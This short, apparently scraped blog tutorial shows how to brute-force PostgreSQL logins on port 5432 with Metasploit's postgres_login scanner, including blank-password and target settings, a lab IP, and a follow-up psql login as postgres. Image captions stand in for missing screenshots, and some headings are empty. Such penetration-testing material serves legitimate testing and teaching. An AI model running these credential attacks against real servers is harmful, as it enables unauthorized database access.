Ultimate Guide to Attack PostgreSQL Server Port 5432

Attack PostgreSQL Server

Attack PostgreSQL – This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.

Rapid 7

What is PostgreSQL?

PostgreSQL is a powerful, open source object-relational database system with over 30 years of active development that has earned it a strong reputation for reliability, feature robustness, and performance.

Port 5432 Vulnerabilities

Attacking PostgreSQL with Metasploit

Attack PostgreSQL Server

Attack PostgreSQL Server

use auxiliary/scanner/postgres/postgres_login
imagem 4
msf5 auxiliary(scanner/postgres/postgres_login) > show options
msf5 auxiliary(scanner/postgres/postgres_login) > set BLANK_PASSWORDS true
msf5 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 172.16.74.129

Attack PostgreSQL Server

msf5 auxiliary(scanner/postgres/postgres_login) > exploit
Screenshot from 2019 11 16 22 09 16 1024x283 1
root@poplab:~# psql -h 172.16.74.129 -U postgres -W postgres
Screenshot from 2019 11 16 22 15 53 1

PostgreSQL Security

https://www.postgresql.org/

Leave a Reply